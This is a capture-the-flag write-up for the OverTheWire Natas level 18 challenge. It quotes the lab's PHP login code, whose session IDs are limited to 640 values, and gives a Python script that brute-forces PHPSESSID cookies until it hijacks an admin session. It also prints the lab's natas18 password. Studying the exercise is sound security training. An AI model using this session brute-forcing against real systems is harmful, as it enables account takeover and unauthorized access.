Challange:
This time we see a real loginscreen, requesting a username and password. We can also see the source code again. The source code can be found below. Some remarks I found in the code:

  • Return 1 is used for an admin login, but this function is disabled.
  • Return 0 is used if not logged in with admin
  • I also see something with cookies and 1 being returned as admin.
  • The maxid for sessions is only 640 because this will be enough for the users. This kinda alarms me.
$maxid = 640; // 640 should be enough for everyone

function isValidAdminLogin() { /* {{{ */
    if($_REQUEST["username"] == "admin") {
    /* This method of authentication appears to be unsafe and has been disabled for now. */
        //return 1;
    }

    return 0;
}
/* }}} */
function isValidID($id) { /* {{{ */
    return is_numeric($id);
}
/* }}} */
function createID($user) { /* {{{ */
    global $maxid;
    return rand(1, $maxid);
}
/* }}} */
function debug($msg) { /* {{{ */
    if(array_key_exists("debug", $_GET)) {
        print "DEBUG: $msg<br>";
    }
}
/* }}} */
function my_session_start() { /* {{{ */
    if(array_key_exists("PHPSESSID", $_COOKIE) and isValidID($_COOKIE["PHPSESSID"])) {
    if(!session_start()) {
        debug("Session start failed");
        return false;
    } else {
        debug("Session start ok");
        if(!array_key_exists("admin", $_SESSION)) {
        debug("Session was old: admin flag set");
        $_SESSION["admin"] = 0; // backwards compatible, secure
        }
        return true;
    }
    }

    return false;
}
/* }}} */
function print_credentials() { /* {{{ */
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas19\n";
    print "Password: <censored></pre>";
    } else {
    print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.";
    }
}
/* }}} */

$showform = true;
if(my_session_start()) {
    print_credentials();
    $showform = false;
} else {
    if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) {
    session_id(createID($_REQUEST["username"]));
    session_start();
    $_SESSION["admin"] = isValidAdminLogin();
    debug("New session started");
    $showform = false;
    print_credentials();
    }
} 

if($showform) {
?>

<p>
Please login with your admin account to retrieve credentials for natas19.
</p>

<form action="index.php" method="POST">
Username: <input name="username"><br>
Password: <input name="password"><br>
<input type="submit" value="Login" />
</form> 

After looking through the code and failing several things like setting an admin cookie. I looked into the sessionID bruteforcing on OWASP. It is possible that we need to try al 640 session ID’s. Lets try to make a python script for this. I came up with the following that worked. It took me some trial and error since i’m just learning python.

import requests

url = "http://natas18.natas.labs.overthewire.org/"
auth_username = "natas18"
auth_password = "xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP"
user_str = "You are logged in as a regular user."

for i in range(1,641):
    cookies = dict(PHPSESSID=str(i))
    r = requests.get(url, auth=(auth_username, auth_password), cookies=cookies)
    if user_str in r.text:
        print ("Attempt ", i, " is not admin!")
    else:
        print ("Attempt ", i, " IS ADMIN!")
        print (r.content)
        break

After running it I got the following output:

Attempt  108  is not admin!
Attempt  109  is not admin!
Attempt  110  is not admin!
Attempt  111  is not admin!
Attempt  112  is not admin!
Attempt  113  is not admin!
Attempt  114  is not admin!
Attempt  115  is not admin!
Attempt  116  is not admin!
Attempt  117  is not admin!
Attempt  118  is not admin!
Attempt  119  IS ADMIN!

So 119 is Admin. Lets go to our browser and change the PHPSESSID to 119 and refresh the page. We got access to level 19!

Leave a Reply

Your email address will not be published. Required fields are marked *